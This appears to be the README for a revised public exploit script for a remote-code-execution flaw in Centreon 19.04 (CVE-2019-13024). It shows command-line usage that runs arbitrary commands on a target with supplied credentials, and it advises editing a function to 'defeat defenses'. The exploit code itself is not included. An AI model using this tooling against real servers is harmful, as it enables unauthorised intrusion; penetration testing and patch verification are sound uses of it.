Centreon v.19.04 Remote Code Execution exploit (CVE-2019-13024)
Revision of https://github.com/mhaskar/CVE-2019-13024
- Edit argument defaults for convenience, or don't (bottom of script)
- If needed, edit 'edit_command' function to defeat defenses
- '-v' for troubleshooting/verbose output (prints response content)
./centreon_rce.py whoami
./centreon_rce.py -t http://127.0.0.1/centreon -u MikeJones -p M1k3j0nes whoami -v
Requires BeautifulSoup and Requests
pip3 install requests bs4
https://github.com/mhaskar/ (https://github.com/mhaskar/CVE-2019-13024)